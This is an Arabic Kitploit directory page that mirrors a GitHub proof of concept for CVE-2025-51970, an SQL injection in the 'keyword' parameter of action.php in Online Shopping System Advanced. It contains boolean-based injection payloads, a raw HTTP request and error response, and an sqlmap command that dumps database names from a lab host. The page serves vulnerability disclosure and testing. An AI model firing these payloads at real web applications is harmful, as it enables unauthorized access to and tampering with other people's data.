Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-51970 — حقن SQL في نظام التسوق عبر الإنترنت المتقدم (CVE-2025-51970) | Kitploit
أدوات/GitHubGitHub/m4xiq/cve-2025-51970
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقأمن قواعد البيانات
GitHubm4xiq/cve-2025-51970

CVE-2025-51970

حقن SQL في نظام التسوق عبر الإنترنت المتقدم (CVE-2025-51970)

عرض المستودع
13منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-51970

CVE-2025-51970 - حقن SQL في نظام التسوق عبر الإنترنت المتقدم

ملخص

تم اكتشاف ثغرة أمنية خطيرة من نوع حقن SQL في مشروع Online Shopping System Advanced بواسطة PuneethReddyHC. توجد الثغرة في action.php، الذي يفشل في تنقية إدخال المستخدم من معامل POST keyword بشكل صحيح. يمكن للمهاجم حقن SQL ضار لاستخراج البيانات أو العبث بقاعدة البيانات.


التفاصيل الفنية

  • نوع الثغرة: SQL Injection
  • الملف المتأثر: action.php
  • المعامل: keyword (عبر POST)
  • الإصدار المتأثر: 1.0
  • نوع الهجوم: عن بعد
  • التأثير: الوصول غير المصرح به للبيانات، التلاعب بقاعدة البيانات

إثبات المفهوم (PoC)

e%' AND ((42)=(43-1)) AND '0004XX7'!='0004XX7% e%' AND ((42)=(43)) AND '0004XX7'!='0004XX7% SELECT database(); -- Returns `onlineshop`

الحمولة الصحيحة (تتجاوز المنطق)

الحمولة الخاطئة (تفشل المنطق)


طلب HTTP

root@kitploit:~
<Highlight language="http">
POST /online-shopping-system-advanced-master/action.php HTTP/1.1
Host: 192.168.1.109
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Accept: */*
Referer: http://192.168.1.109/online-shopping-system-advanced-master/
Content-Length: 75
Connection: close
keyword=test'&search=1
</Highlight>

استجابة HTTP

root@kitploit:~
HTTP/1.1 200 OK
Date: Sun, 20 Jul 2025 10:07:50 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12

Fatal error: Uncaught mysqli_sql_exception: You have an error in your SQL syntax; 
check the manual that corresponds to your MariaDB server version for the right 
syntax to use near ''' at line 1 in 
C:\xampp\htdocs\online-shopping-system-advanced-master\action.php:193

مثال على بصمة قاعدة البيانات


root@kitploit:~
e%' AND 2*3*8=6*8 AND '0004XX7'!='0004XX7%
e%' AND 3*2>5 AND '0004XX7'!='0004XX7%
e%' AND 3*2*0>=0 AND '0004XX7'!='0004XX7%

الاستغلال الآلي باستخدام sqlmap

يمكن تأكيد الثغرة واستغلالها تلقائيًا باستخدام sqlmap.

الأمر المستخدم

root@kitploit:~
sqlmap -u "http://192.168.1.109/action.php" --data="keyword=test&search=1" --dbs

المخرجات

root@kitploit:~
[13:07:39] [INFO] fetching database names
available databases [6]:
[*] information_schema
[*] mysql
[*] onlineshop
[*] performance_schema
[*] phpmyadmin
[*] test
صورة
تنزيل الأداة